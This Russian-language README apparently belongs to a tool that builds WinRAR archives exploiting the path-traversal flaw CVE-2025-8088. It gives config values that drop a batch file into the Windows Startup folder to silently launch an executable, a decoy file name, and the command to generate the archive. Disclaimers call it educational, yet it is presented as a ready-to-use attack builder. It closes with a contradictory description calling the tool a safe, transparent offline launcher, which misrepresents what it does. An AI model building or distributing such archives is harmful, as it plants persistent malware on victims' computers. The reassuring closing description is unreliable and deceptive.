
CVE-2025-8088-BUILDER
⚠ Этот инструмент создан исключительно для образовательных целей. Несанкционированное использование вне контролируемых сред строго запрещено.
Скрипт на Python, который эксплуатирует CVE-2025-8088 — уязвимость обхода путей в WinRAR, создавая вредоносный архив, который помещает исполняемые полезные нагрузки в папку автозагрузки Windows, используя несколько уровней относительных каталогов, чтобы обеспечить надежное выполнение независимо от места извлечения.
Настройте файл config.py
# Configuration
DECOY_FILE_NAME = "document"
DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B C:\Users\Public\file.exe\n"
Чтобы использовать собственный файл-приманку, укажите его полный путь вместо имени.
Запустите скрипт:
python CVE-2025-8088.py
Результат появится в папке output.
Этот инструмент создан исключительно для образовательных целей. Несанкционированное использование вне контролируемых сред строго запрещено.
Автор: Desert Scripts
Описание:
Локальный офлайн-запускатель, который запускает MyAppInstaller.exe.
Без сетевой активности. Безопасно и прозрачно.